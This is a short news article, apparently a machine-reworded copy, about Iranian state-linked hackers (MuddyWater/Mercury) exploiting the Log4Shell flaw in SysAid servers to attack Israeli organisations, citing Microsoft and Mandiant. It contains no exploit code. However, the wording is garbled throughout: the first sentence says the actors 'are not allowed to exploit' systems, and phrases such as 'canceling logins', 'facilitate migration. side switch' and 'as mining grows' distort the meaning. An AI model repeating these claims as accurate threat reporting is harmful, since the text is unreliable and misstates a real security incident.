Iranian state-sponsored organizations are not allowed to exploit unpatched systems running Log4j to target Israeli entities, indicating a long-standing vulnerability that needs to be fixed.
Microsoft attributed the latest operational group to the monitored contamination threat group as MuddyWater (aka Cobalt Ulster, Mercury, Seedworm or Static Kitten), which is linked to the Iranian intelligence apparatus, the Ministry of Intelligence and Security. security (MOIS).
Notable attacks use unsecured instances of SysAid Server against the Log4Shell vulnerability as vectors for initial access, marking a departure from the model of actors taking advantage of VMware application to breach the target environment.
“Once access is gained, Mercury establishes persistence, canceling logins, and moves within the targeted organization using both custom and well-known hacking tools, as well as as built-in operating system tools for keyboard attacks,” Microsoft said.
The tech giant’s threat intelligence team said it observed attacks between July 23 and 25, 2022.
A successful compromise is said to have occurred after implementing the web shell to execute commands that would allow the agent to conduct reconnaissance, establish persistence, steal credentials, and facilitate migration. side switch.
Also used for command and control communication (C2) in intrusions is a management and control software monitoring remote named eHorus and Ligolo, a reverse tunneling tool of choice for the enemy.
This finding comes as the US Department of Homeland Security’s Cybersecurity Review Board (CSRB) considers a critical vulnerability in the open source Java-based logging framework to be a widespread weakness that will continue to cause problems. harmful to organizations for years to come as mining grows.
The fact that Log4j is widely used across a wide range of software and services from many vendors means that sophisticated adversaries such as national-state organizations and commodity operators also have an opportunity to take advantage of the loss. vulnerabilities to cause a variety of attacks.
The Log4Shell attacks also follow a recent Mandiant report detailing an espionage campaign targeting shipping, government, energy and health care of Israel by a hacking group likely Iranian UNC3890.